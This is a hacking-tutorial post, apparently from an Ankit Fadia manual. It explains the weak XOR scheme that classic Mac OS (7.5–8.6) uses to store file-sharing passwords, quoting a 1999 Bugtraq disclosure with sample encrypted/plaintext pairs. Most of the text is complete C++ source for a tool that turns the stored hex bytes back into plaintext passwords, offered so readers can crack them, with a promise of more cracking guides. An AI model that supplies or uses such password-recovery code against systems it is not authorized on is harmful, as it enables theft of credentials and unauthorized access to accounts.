The following piece of code demonstrates the working of the algorithm used by MacOS to encrypt passwords and also how to decrypt such passwords. So Enjoy.

/*
 Written by Nate Pierce

 July 14, 1999

 Algorithm taken from:

 I have tested this on 8.6 and it works fine as well.

 Compiled quite peachily on linux 2.2.10 with:
   g++ -o macfspwd macfspwd.c

 Run example (with debug on):

 [user@server user]$ ./macfspwd 000406180D0A190B
 Original string: 00 04 06 18 0d 0a 19 0b
 1st XOR string: 00 00 04 06 18 0d 0a 19
 2nd XOR string: 73 70 63 67 74 70 72 6b
 Password is: stayaway

 ----- from the url above -----
 The encryption algorithm in MacOS system is simple and the password can be easily [...]

 Password is stored in Users & Groups Data File in Preferences folder. Offset is different on
 each system and depends on Users & Groups configuration, but it always lies after owner's
 username. It's not so difficult to find it using a hex editor, even if we don't know owner's [...]

 Here are some examples of encrypted passwords:
 00 04 06 18 0D 0A 19 0B = stayaway
 0A 1F 10 1B 00 07 75 1E = yellow
 1C 1B 16 14 12 62 10 7B = owner
 07 02 13 1A 1E 0F 1A 14 = turnpage
 27 25 33 27 27 39 24 7E = Trustno1

 AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh

 AA BB CC DD EE FF GG HH - encrypted password (hex)
 aa bb cc dd ee ff gg hh - decrypted password in ASCII codes (hex)

 aa=AA XOR 73H
 bb=BB XOR AA XOR 70H
 cc=CC XOR BB XOR 63H
 dd=DD XOR CC XOR 67H
 ee=EE XOR DD XOR 74H
 ff=FF XOR EE XOR 70H
 gg=GG XOR FF XOR 72H
 hh=HH XOR GG XOR 6BH

 An example:
 Let's take 00 04 06 18 0D 0A 19 0B

 00H XOR 73H = 73H = s
 04H XOR 00H = 04H; 04H XOR 70H = 74H = t
 06H XOR 04H = 02H; 02H XOR 63H = 61H = a
 18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y
 0DH XOR 18H = 15H; 15H XOR 74H = 61H = a
 0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w
 19H XOR 0AH = 13H; 13H XOR 72H = 61H = a
 0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y

 tested on:
 MacOS 7.5.3, 7.5.5, 8.1, 8.5.
 copied verbatim from a post to bugtraq by Dawid Ladix Adamski <ladix@FRIKO4.ONET.PL> on
 July 10, 1999
 ----- snip -----
*/

#include <iostream>
#include <iomanip>
#include <cstring>
using namespace std;

// comment this out if don't want to see the extra info
#define DEBUG

// I think the max password length for file sharing is 8 characters
#define PWLEN 8

int hexdig(char q);
// returns decimal equiv if q is 0-9, a-f, or A-F

int hexint(char p,char q);
// returns value of 2 digits spliced together - hexint(15,15) will return 255

int main(int argc, char *argv[]){
  int s1[10],s2[10],s3[10],i;
  char pwd[PWLEN+1];

  // first string - try 000406180D0A190B
  if(argc < 2 || strlen(argv[argc-1]) != 2*PWLEN){
    cout<<"\nError: last argument should be a 16 digit hex number (no spaces please)\n";
    return 1;
  }
  for(i=0;i<PWLEN;i++)
    s1[i]=hexint(argv[argc-1][2*i],argv[argc-1][2*i+1]);

  // chunk in 2nd XOR string - based on the string from the file
  // (each byte is XORed with the encrypted byte before it; nothing before the first)
  s2[0]=0;
  for(i=1;i<PWLEN;i++)
    s2[i]=s1[i-1];

  // chunk in final XOR string - this is constant
  int konst[PWLEN]={0x73,0x70,0x63,0x67,0x74,0x70,0x72,0x6b};
  for(i=0;i<PWLEN;i++)
    s3[i]=konst[i];

  // plaintext byte = file byte XOR previous file byte XOR constant
  for(i=0;i<PWLEN;i++)
    pwd[i]=(char)(s1[i]^s2[i]^s3[i]);
  pwd[PWLEN]=0;

#ifdef DEBUG
  cout<<"Original string: ";
  for(i=0;i<PWLEN;i++)
    cout<<hex<<setw(2)<<setfill('0')<<s1[i]<<" ";

  cout<<"\n1st XOR string: ";
  cout<<"00 ";
  for(i=0;i<PWLEN-1;i++)
    cout<<hex<<setw(2)<<setfill('0')<<s2[i+1]<<" ";

  cout<<"\n2nd XOR string: ";
  for(i=0;i<PWLEN;i++)
    cout<<hex<<setw(2)<<setfill('0')<<s3[i]<<" ";
  cout<<"\n";
#endif

  cout<<"Password is: "<<pwd<<"\n";

  return 0;
}

int hexdig(char q){
  if(q>47 && q<58)return 48;
  if(q>64 && q<71)return 55;
  if(q>96 && q<103)return 87;
  return 0;
}

int hexint(char p,char q){
  return 16*(p-hexdig(p))+(q-hexdig(q));
}



Well, that is all for now. I will update this manual explaining how to crack more passwords very very soon, so hang in there.

Ankit Fadia


